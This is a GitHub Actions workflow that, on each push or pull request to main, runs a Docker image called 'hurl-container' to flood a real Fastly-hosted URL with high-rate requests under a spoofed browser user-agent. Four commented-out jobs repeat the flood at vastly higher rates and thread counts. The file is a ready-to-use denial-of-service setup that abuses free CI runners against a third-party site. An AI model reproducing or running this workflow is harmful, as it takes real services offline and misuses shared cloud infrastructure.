name: Run Docker Command

on:
  push:
    branches:
      - main
  pull_request:
    branches:
      - main

jobs:
  running-command1:
    runs-on: ubuntu-latest

    steps:
      - name: Instance 1
        uses: actions/checkout@v3

      - name: Run Docker container inside the action docker
        uses: addnab/docker-run-action@v3
        with:
            image: cyberhack255/hurl-container
            run: | 
                  export url="https://ss007.global.ssl.fastly.net/"
                  hurl $url --seconds=300 --rate=10000 --thread=10 --header=user-agent:'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/600.00'
  # running-command2:
    # runs-on: ubuntu-latest

    # steps:
      # - name: Instance 1
        # uses: actions/checkout@v3

      # - name: Run Docker container inside the action docker
        # uses: addnab/docker-run-action@v3
        # with:
            # image: cyberhack255/hurl-container
            # run: | 
                  # export url="https://ss007.global.ssl.fastly.net/"
                  # hurl $url --seconds=300 --rate=10000000000 --thread=58 --header=user-agent:'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/600.00'
  # running-command3:
    # runs-on: ubuntu-latest

    # steps:
      # - name: Instance 1
        # uses: actions/checkout@v3

      # - name: Run Docker container inside the action docker
        # uses: addnab/docker-run-action@v3
        # with:
            # image: cyberhack255/hurl-container
            # run: | 
                  # export url="https://ss007.global.ssl.fastly.net/"
                  # hurl $url --seconds=300 --rate=10000000000 --thread=58 --header=user-agent:'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/600.00'
  # running-command4:
    # runs-on: ubuntu-latest

    # steps:
      # - name: Instance 1
        # uses: actions/checkout@v3

      # - name: Run Docker container inside the action docker
        # uses: addnab/docker-run-action@v3
        # with:
            # image: cyberhack255/hurl-container
            # run: | 
                  # export url="https://ss007.global.ssl.fastly.net/"
                  # hurl $url --seconds=300 --rate=10000000000 --thread=58 --header=user-agent:'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/600.00'
  # running-command5:
    # runs-on: ubuntu-latest

    # steps:
      # - name: Instance 1
        # uses: actions/checkout@v3

      # - name: Run Docker container inside the action docker
        # uses: addnab/docker-run-action@v3
        # with:
            # image: cyberhack255/hurl-container
            # run: | 
                  # export url="https://ss007.global.ssl.fastly.net/
                  # hurl $url --seconds=300 --rate=10000000000 --thread=58 --header=user-agent:'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/600.00'
